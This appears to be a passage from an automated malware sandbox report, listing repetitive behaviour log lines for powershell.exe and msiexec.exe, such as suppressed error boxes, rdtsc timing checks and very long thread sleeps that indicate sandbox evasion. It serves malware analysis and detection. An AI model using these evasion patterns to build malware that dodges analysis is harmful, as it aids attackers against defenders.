            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0B75892B rdtsc 2_2_0B75892B
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598905Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598647Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598421Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598305Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597748Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597625Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596504Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596375Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596261Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596132Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596011Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595754Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595530Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594718Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594499Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594390Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594265Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594156Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594031Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593922Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599648Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599108Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597905Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597796Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597628Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597476Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597101Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596874Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596218Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594343Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594234Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3234Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6559Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8355
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1184
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAPI coverage: 4.8 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 672Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -29514790517935264s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1056Thread sleep count: 6658 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 1056Thread sleep count: 3177 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -599452s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -599282s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -598905s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -598765s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -598647s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -598421s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -598305s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -598187s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -598078s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -597968s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -597859s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -597748s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -597625s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -597515s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -597406s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -597297s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -597187s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -596968s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -596750s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -596640s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -596504s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -596375s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -596261s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -596132s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -596011s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -595754s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -595640s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -595530s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -594718s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -594499s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -594390s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -594265s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -594156s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -594031s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5640Thread sleep time: -593922s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6880Thread sleep count: 2558 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -599874s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -599648s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6880Thread sleep count: 7290 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6104Thread sleep time: -599328s >= -30000sJump to behavior
